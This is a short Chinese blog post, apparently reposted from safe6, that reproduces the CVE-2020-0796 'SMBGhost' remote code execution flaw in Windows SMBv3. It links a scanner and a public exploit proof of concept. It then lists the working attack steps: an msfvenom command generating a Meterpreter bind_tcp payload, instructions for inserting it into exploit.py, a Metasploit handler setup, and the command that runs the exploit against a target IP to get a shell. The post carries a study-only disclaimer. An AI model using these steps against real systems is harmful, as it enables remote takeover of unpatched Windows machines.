CVE-2020-0796微软SMBv3永恒之黑漏洞复现

颓废 2021年1月20日01:30:38评论146 views字数 614阅读2分2秒阅读模式
摘要

CVE-2020-0796SMB永恒之黑 多的不用说,又是一个内网大杀器。win10用户真香。具体视频,我会在头条号(safe6安全)发布。

CVE-2020-0796SMB永恒之黑

前言

多的不用说,又是一个内网大杀器。win10用户真香。具体视频,我会在头条号(safe6安全)发布。

工具下载

奇安信的检测工具
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
EXP下载地址
https://github.com/chompie1337/SMBGhost_RCE_PoC

漏洞复现

1、先用以下命令生成payload

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f python 

2、使用生成payload,在exploit.py中用生成的buf替换自己的USER_PAYLOAD

3、msf开启监听

use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp  set rhost 192.168.0.210 set lport 4444 exploit 

4、反弹shell

python3 exploit.py -ip 192.168.0.210 

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

CVE-2020-0796微软SMBv3永恒之黑漏洞复现

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2020-06-07

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2021年1月20日01:30:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-0796微软SMBv3永恒之黑漏洞复现http://cn-sec.com/archives/247638.html

发表评论

匿名网友 填写信息